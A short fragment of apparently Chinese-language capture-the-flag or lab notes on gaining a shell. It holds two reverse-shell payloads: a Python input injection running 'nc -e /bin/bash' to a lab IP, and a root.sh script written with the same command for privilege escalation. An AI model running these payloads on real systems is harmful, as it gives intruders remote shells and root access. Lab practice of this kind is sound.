Pasted%20image%2020240403082303
input不修改输入的类型__import__('os').system('nc -e /bin/bash 10.9.0.54 4444')
直接反弹shell了

同样没有修改权限但是有删除权限,写个反弹shell

写shellprintf '#!/bin/bash\nnc -e /bin/bash 10.17.6.173 9999' > root.sh